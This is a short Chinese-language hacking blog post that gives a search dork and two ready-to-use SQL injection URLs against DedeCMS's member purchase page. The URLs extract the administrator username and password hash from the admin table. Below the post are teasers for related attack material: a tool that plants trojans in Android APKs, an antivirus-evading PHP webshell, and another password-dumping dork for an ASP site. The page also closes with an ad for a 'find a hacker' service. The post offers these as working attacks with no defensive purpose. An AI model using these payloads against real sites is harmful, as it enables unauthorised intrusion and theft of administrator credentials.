dedecms注入爆管理员用户密码 ***

hacker5年前 (2020-05-31)黑客文章1033

关键词：powered by dedecms

首先注册个用户,注册地址:
/member/index_do.php?fmdo=user&dopost=regnew

爆管理帐号:
/member/buy_action.php?product=member&pid=1%20and%201=11%20union

%20select%201,2,userid,4,5%20from%20%23@__admin/*

爆管理员密码
/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20

select%201,2,substring(pwd,9,16),4,5%20from%20%23@__admin/*

标签: 黑客技术

返回列表

Argus是啥？ Argus可用以协助适用网络信息安全管理方法和互联网调查取证。根据恰当的对策，克罗地亚数据信息能够被采掘，以明确您是不是古代历史遭受侵入或进攻，在公布进攻并明确了让步指标值（IO...

后台管理员是网站后台必不可少的一个环节，如何使用aspmaker实现超级管理与普通管理员登陆后台。下面就详细讲解一下。第一步，首先打开一个已经设置好的aspmaker文件，在工具条中点击“...

backdoor-apk是一个shell脚本制作，它简单化了向一切Android APK文档加上木马程序的全过程。此shell脚本制作的客户应具备Linux，Bash，Metasploit，Apkt...

漏洞影响版本 v10.0 v11.0 关键字：inurl:”HomeMarket.asp” 默认后台：/admin 直接爆用户密码： http://www.xxx.com/New...

很多人想学网络黑客专业知识，却不知道怎样新手入门，在网上的实例教程也太繁杂，新手看过也头痛，那還是我要写网络黑客系列产品基础教程吧，跟着做，你可以黑客入门的。它是第四篇，大家借由扫描仪之首NMAP的...

一个能够绕开当今目前市面上基本上全部Webshell查杀的免杀PHP一句话木马脚本制作。...

找黑客平台